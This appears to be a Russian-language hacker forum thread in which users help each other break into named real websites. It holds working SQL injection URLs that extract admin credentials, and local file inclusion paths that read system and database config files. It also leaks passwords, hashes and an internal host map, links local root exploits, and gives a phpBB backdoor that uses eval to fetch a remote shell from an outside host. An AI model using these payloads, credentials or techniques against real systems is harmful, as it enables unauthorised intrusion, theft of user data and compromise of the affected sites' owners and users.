http://ping.ua/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+and+(select+1+from+(select+count(0),concat((sele ct+concat_ws(0x3a,admin_username,admin_password)+f rom+se_admins+limit+0,1),floor(rand(0)*2))+from+se _admins+group+by+2)a)--+


последняя единичка в каждом результате лишняя

Попробуй залить шелл через пхп май админ если есть разрешение на into outfile
а как узнать куда его заливать. те где находятся файлы сайта :)

Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости.

Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть)
http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png

Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче.

brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже.

Спасибо.

ЗЫ: Поиск юзал. Просьба постить только по теме.
ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС.
ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".

Ап

ReckouNT забей..

ReckouNT, увы но бесик авторизацию ты не обойдешь. Только брутом.

']ReckouNT забей..

Не могу, к данному сайту личный интерес. К тому же там большая база юзверей и он самописный, дырок должно быть дофига.

ReckouNT, увы но бесик авторизацию ты не обойдешь. Только брутом.

Очень жаль, я надеялся что к такому старому способу что либо придумали. Брут там использовать очень легко.
Ладно, придется либо брутить, либо искать новую уязвимость.
=======
Да, и кстати: как можно просмотреть исходный код страницы при вылетающем окне? В фф и осле просмотреть не могу, т.к. мигает окно логинпасса по причине что не ввел данные.

На странице неудачи входа он меняется. Нужно посмотреть, какие имена присвоены полям, для настройки брута.

Исправьте запрос, никак не могу вывести таблицу http://blocked/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins

unhex(hex(admin_username))
aes_descrypt(aes_encrypt(admin_username,12),12)
или таблица находится в другой бд.

а как узнать куда его заливать. те где находятся файлы сайта :)

ты хоть сам то понял что написал?

Да, и кстати: как можно просмотреть исходный код страницы при вылетающем окне? В фф и осле просмотреть не могу, т.к. мигает окно логинпасса по причине что не ввел данные.

На странице неудачи входа он меняется. Нужно посмотреть, какие имена присвоены полям, для настройки брута.
А никак ты это не сделаешь, там формы как таковой нету. Вот пример http авторизации на пхп

<?php
$result = http_auth('http://site.ru/admin/','username','password');
echo $result;

function http_auth($url,$login,$password) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERPWD, $login.":".$password);
$result = curl_exec($ch);
return $result;
}

?>

ну а с брутом там сам разбирайся, не думаю что это сложно.

Подскажите как можно использовать открытый прокси, ну т.е сканер выдал открыт порт 8080

Это может позволить злоумышленнику обойти брандмауэр и подключить к чувствительным порты, такие как 23 (Telnet), 25 (Sendmail)

ну вот что то такое... хотелось бы не много подробнее про это

Подскажите как можно использовать открытый прокси, ну т.е сканер выдал открыт порт 8080

Это может позволить злоумышленнику обойти брандмауэр и подключить к чувствительным порты, такие как 23 (Telnet), 25 (Sendmail)

ну вот что то такое... хотелось бы не много подробнее про это
Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?

Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?
что можно сделать если у сайта открыт порт 8080 ? сканер пишет критическая уязвимость, вот хочу понять почему и как ей пользоваться

Ничего нельзя сделать.

попал в админку через скулю типа 1 or 1 =1 --

в админке нет возможности залить шелл, хотя была, но какието уроды, которые там уже побывали раз*бали всё. Но я нашол там локальный инклуд, но на серваке стоит mod_secury который фильтрует и в гете и посте данные типа /etc/passwd, Хотя /etc/hosts - прошол. помогите обойти плиз mod_securuty для локального инклуда плиз.

короче ситуация такая ...
цель залить шелл на driverguide.com
найденные баги etc...
http://forums.driverguide.com/ форум Булка
http://myupdates.com/static.php?type=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&files=screen%2Cstyle
http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/passwd%00
что то etc/passwd разные показывает хотя файл тот же =\

http://myupdates.com/static.php?type=css&files=../index.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members//icx/general/filesystem.inc.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members/icx/driverguide/home/index.php%00http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members/icx/driverguide/home/../../driverguide/home/aptimus.inc.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/hosts%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members/icx/driverguide/home//support/support.inc.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members/icx/driverguide/home/voyeur.inc.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members/icx/driverguide/home/../../ums/driverguide_conf/aptimus_login.xinc.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members//icx/general/filesystem.inc.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/members/icx/driverguide/home/robots.php%00
http://myupdates.com/static.php?type=css&files=../../../../icx/ums/ums_instance.php%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../etc/httpd/conf/httpd.conf%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../var/log/httpd/access_log%00
http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/hosts%00
Path: DocumentRoot /home/httpd/driverguide.com/beta/public
дальше ....
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/driverguide.com/forums/public/includes/config.php%00
данные БД но коннекта внешне нема =(
$config['Database']['dbtype'] = 'mysql';

$config['Database']['dbname'] = 'vb3';

$config['Database']['tableprefix'] = 'vb3_';

$config['Database']['technicalemail'] = '';

$config['Database']['force_sql_mode'] = false;


$config['MasterServer']['servername'] = '192.168.1.194';
$config['MasterServer']['port'] = 3306;

$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

$config['MasterServer']['usepconnect'] = 0;


$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;

Версия Linux version 2.4.21-60.ELsmp (mockbuild@hs20-bc2-4.build.redhat.com) (gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-59)) #1
Локалка/соседы
192.168.1.244 web6.driverguide.com web6
192.168.1.211 web1.driverguide.com web1
192.168.1.212 web2.driverguide.com web2
192.168.1.214 web3.driverguide.com web3
192.168.1.215 web4.driverguide.com web4
192.168.1.243 web5.driverguide.com web5
127.0.0.1 members-images.driverguide.net
192.168.1.219 eml.driverguide.com
192.168.1.244 members.driverguide.com members
192.168.1.244 forums.driverguide.com forums
192.168.1.244 beta.driverguide.com beta
192.168.1.244 list.driverguide.com list
192.168.1.220 db1.driverguide.com db1
192.168.1.219 email.driverguide.net email
192.168.1.211 web1-internal.driverguide.net
192.168.1.212 web2-internal.driverguide.net

http://members.driverguide.com//internal/phpMyAdmin/
пыхадмин =) phpMyAdmin 2.5.3 сплойт для этой ветке http://milw0rm.com/exploits/309 но хз пока не юзал
http://myupdates.com/internal/admin/
http://myupdates.com/static.php?type=css&files=../internal/admin/.htaccess%00
editor:7vr1es1uwzlqI DES
в Форуме 91к юзверов дамп ваше =)
-added-
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/myupdates.com/www/bcx/myupdates/home/_htpasswd/.htpasswd%00
editor:7vr1es1uwzlqI
http://members.driverguide.com//internal/phpMyAdmin/
Конфиг ПМА http://myupdates.com/static.php?type=css&files=../../../../../../../../../..//home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/config.inc.php%00

Alias /internal/phpMyAdmin/ "/home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/
путь с веба /internal/phpMyAdmin/ но млин
$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

http://myupdates.com/internal/admin/
вот еще http://myupdates.com/static.php?type=csshttp://myupdates.com/static.php?type=css&files=../../../../../../../../../..///home/httpd/driverguide.com/members/icx/thirdparty/FlashChat_v37/config.php%00
$database = "driverdb__live"; // MySQL database name
$dbuser = "dev"; // MySQL username
$dbpass = "dbd3v"; // MySQL password
$host = "192.168.1.194"; // MySQL host name
moderatorPassword = "mod123"; // to login as a moderator
$spyPassword = "spy123"; // to login as a spy (disabled when using XOOPS)
еще кое что откопал
http://myupdates.com/static.php?type=css&files=../../../../../../../../../..//home/httpd/icentric.com/intranet/public/.htpasswd%00
http://intranet.icentric.com/
intranet:f68alIucmxrmU
quincy:B7B2pTzqkrdbQ
опять DES
http://blog.driverguide.com/wp-login.php стоит ВП

Попробовал через сессию но тут как бэ не совсем инклуд а читалка файлов получается, принклудит в лог апача нету резона=\
что можете рекомендовать ? что то в 5 утра башка не варит дальше, хотя 98% данные в руках но ничего не выходит =\
===
короче вот и скуля http://members.driverguide.com/index.php?companyid=-2712+union+select+user(),user_pass+from+driverguid e_blog.wp_users+/*&action=getinfo
<title>dev@192.168.1.222 ($P$B1SdEpP2uJl/0yIR3M6TryHvTigpEC/) Drivers / Support / Contact Info</title>
http://members.driverguide.com/index.php?companyid=-2712+union+select+username,password+from+user+limi t+1,100000/*&action=getinfo
<title>admin (a1e5555abefe434946e95f0de3fb2787) Drivers / Support / Contact Info</title>

a1e5555abefe434946e95f0de3fb2787 : Shaaolin
quincy:B7B2pTzqkrdbQ:p51s
http://intranet.icentric.com/
http://myupdates.com/internal/admin/
http://members.driverguide.com/internal/phpMyAdmin/
короче никуда не подошел или фильтр по айпи или хз =\
есть идеи ?
P.S Сорри за много букаф )

Есть XSS. Каким образом можно сделать iframe на всё окно?

Есть XSS. Каким образом можно сделать iframe на всё окно?

http://www.htmlbook.ru/html/iframe.html

:.']http://www.htmlbook.ru/html/iframe.html
Благодарствую ;)

есть инъекция 4 ветка

http://gay.ks.ua/links.php?catid=32+and+substring(version(),1,1)=4 :)))

помогите правильно составить запрос, что бы вывод был в ошибке.
или здесь только крутить как слепую?

Херсонский гей-портал :D

http://gay.ks.ua/links.php?catid=32+order+by+4--
http://gay.ks.ua/links.php?catid=-32+union+select+1,2,3,4--

колонки не видны

ищи скул в другом скрипте

вот еще инфа

http://gay.ks.ua/links.php?catid=32+and+substring(user(),1,1)=char( 103)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),2,1)=char( 97)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),3,1)=char( 121)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),4,1)=char( 107)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),5,1)=char( 115)


юзер-gayks

http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile _os,1,1)=char(112)
http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile _os,2,1)=char(99)

думаю ос pc-linux

http://gay.ks.ua/links.php?catid=32 order by 5
=>
Unknown column '5' in 'order clause'
=> по идее можно выводить данные через ошибку

http://gay.ks.ua/links.php?catid=32 order by 5
=>
Unknown column '5' in 'order clause'
=> по идее можно выводить данные через ошибку

на пример

я про то, что вывод ошибки можно поймать
а вот использовать методы из Вывод информации в ошибке для MySQL всех версий (http://qwazar.ru/?p=7) у меня не получилось. может у вас получится ;)

http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM mysql.users
=>
SELECT command denied to user: 'gayks_admin@localhost' for table 'users'

http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM users
=>
Table 'gayks_phorum.users' doesn't exist

прогнал тулзой пашкелы подбор таблиц (без префикса), нашла только одну - video:
http://gay.ks.ua/links.php?catid=32 UNION SELECT id FROM video
=>
The used SELECT statements have a different number of columns

я про то, что вывод ошибки можно поймать
а вот использовать методы из Вывод информации в ошибке для MySQL всех версий (http://qwazar.ru/?p=7) у меня не получилось. может у вас получится ;)

В связи с открытием блога, достаю из недр античата ещё один обнаруженный мной метод, который работает для MySQL всех версий начиная с 4.1 .

gay.ks.ua/links.php?catid=32+and+substring(@@version,1,2)=4. 0

database() - gayks

щас всем народом будем взломать гей портал

заметил у них на на форуме:
Copyright BOY-UANIC 2002-2010
сходил в гугл, нашел это:
http://www.eu-football.info/_links.php?catid=10 and+substring(version(),1,1)=5
т.е. тот же движ, но mysql - 5-ка, соответственно в ней скорее всего можно все, что надо, подсмотреть ;)

балин, и тут облом :)
http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select +version()),floor(rand(0)* 2))+from+information_schema.tables+group+by+2)a)--+
=>
SELECT command denied to user 'gbua_f00t'@'213.186.117.208' for table 'tables'

а вот таблица video и здесь присутствует:
http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select +version()),floor(rand(0)* 2))+from+video+group+by+2)a)--+
=>
Duplicate entry '5.0.45-community-nt-log1' for key 1

всем доброго времени суток.
вопрос - есть сервер Linux 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686
скачал скомпилированный эксплойт Krad отсюда http://files.xakep.biz/Local_Root_Exploits/krad
запускаю ./exploit
получаю ошибку: [6658: 3] tcsetattr: Invalid argument
эээ...что не так ?

http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz

phpbb 2.0.22, есть админские права ..можно как нить залить шелл ??

на эту версию ничего не нашел

http://forum.antichat.ru/thread24488.html

Konqi можно через картинку, но не всегда это работает!
а можно через восстановление БД:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;
а потом в командной строке в профайле
&cmd=phpinfo();
или
cmd=eval(file_get_contents('http://ххх.ru/down/shell.txt'));

phpbb 2.0.22, есть админские права ..можно как нить залить шелл ??

на эту версию ничего не нашел

http://forum.antichat.ru/thread24488.html


https://forum.antichat.ru/showpost.php?p=198446&postcount=3

2 GOGA075

и где ставить этот sql запрос?

Создаешь файл 1.sql пихеш туда этот запрос, топаешь а админку и восстанавливаешь его там!
потом топаешь в профайл и ...
profile.php?mode=editprofile&cmd=phpinfo();
видешь phpinf'у!
ну а дальше шел...

2 GOGA075

и где ставить этот sql запрос?
Делаешь бекап базы,в файл это записываешь,и делаешь восстановление базы,ну или как-то так. :)

ok люди Щас папробую ))

парни сработал спасибо вам :D

phpinfo пашет а вот с шелом никак :(

Parse error: syntax error, unexpected '<' in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code(1) : assert code(1) : eval()'d code on line 1

Warning: assert() [function.assert]: Assertion "eval(file_get_contents('http://mysite.com/shell.php'));" failed in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code on line 1

Konqi расширение шела не php а txt и только txt!

eval(file_get_contents('http://mysite.com/shell.txt'));

А аплоадить шелл некак? :)
5 сек дам линк на пост )

https://forum.antichat.ru/showpost.php?p=1722124&postcount=10463